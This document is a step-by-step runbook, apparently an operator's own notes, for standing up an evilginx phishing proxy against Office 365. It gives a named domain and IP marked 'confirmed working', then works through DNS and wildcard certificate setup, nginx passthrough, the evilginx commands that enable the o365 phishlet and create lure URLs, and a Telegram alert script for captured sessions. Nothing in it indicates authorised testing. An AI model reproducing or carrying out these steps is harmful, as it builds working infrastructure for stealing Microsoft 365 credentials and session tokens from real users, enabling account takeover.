VPS Setup Runbook

Confirmed working — office-auth.com / 80.78.18.72 (S42)
Every step confirmed. Follow in order. Dead ends at /dead-ends.

Prerequisites

VPS with root access (Ubuntu 22/24) · Domain on Cloudflare · evilginx Jan Bakker fork binary · Telegram bot token + chat ID

Step 1 — Cloudflare DNS

Proxy must be OFF (grey cloud).

Type   Name   Content   Note
A      @      VPS IP    root domain
A      *      VPS IP    all subdomains

Step 2 — Cloudflare API Token

Profile > API Tokens > Create Token > Edit zone DNS template. Select the domain. Copy the token.

echo "PASTE_TOKEN_HERE" > /root/.cf_creds
chmod 600 /root/.cf_creds

Step 3 — Wildcard SSL Cert

apt-get install -y certbot python3-certbot-dns-cloudflare
TOKEN=$(cat /root/.cf_creds | tr -d '[:space:]')
echo "dns_cloudflare_api_token = $TOKEN" > /root/.cloudflare.ini
chmod 600 /root/.cloudflare.ini

certbot certonly --dns-cloudflare   --dns-cloudflare-credentials /root/.cloudflare.ini   -d yourdomain.com -d '*.yourdomain.com'   --non-interactive --agree-tos -m admin@yourdomain.com

Step 4 — Nginx SNI Passthrough

apt-get install -y nginx libnginx-mod-stream

Write /etc/nginx/nginx.conf:

load_module /usr/lib/nginx/modules/ngx_stream_module.so;
user www-data;
worker_processes auto;
pid /run/nginx.pid;
events { worker_connections 1024; }
stream {
    server {
        listen 443;
        proxy_pass 127.0.0.1:8443;
        proxy_timeout 600s;
        proxy_connect_timeout 10s;
    }
}
http { server { listen 81; return 301 https://$host$request_uri; } }
nginx -t && nginx

Step 5 — Transfer Evilginx Binary

ssh -i ~/.ssh/id_ed25519 root@OLD_IP "tar -czf - -C /root evilginx-bakker" |   ssh -i ~/.ssh/id_ed25519_njalla root@NEW_IP "tar -xzf - -C /root"

Step 6 — Place Certs for Evilginx

mkdir -p /root/.evilginx/crt/yourdomain.com
cp /etc/letsencrypt/live/yourdomain.com/fullchain.pem    /root/.evilginx/crt/yourdomain.com/o365.crt
cp /etc/letsencrypt/live/yourdomain.com/privkey.pem    /root/.evilginx/crt/yourdomain.com/o365.key

Step 7 — Configure Evilginx

tmux new -s evil
cd /root/evilginx-bakker && ./bin/evilginx -p ./phishlets

Inside evilginx shell:

config domain yourdomain.com
config ip VPS_IP
phishlets hostname o365 yourdomain.com
phishlets enable o365
lures create o365
lures get-url 0

Step 8 — PM2 Notify Script

pm2 start /root/evilginx_notify.py --name evilginx-notify --interpreter python3
pm2 save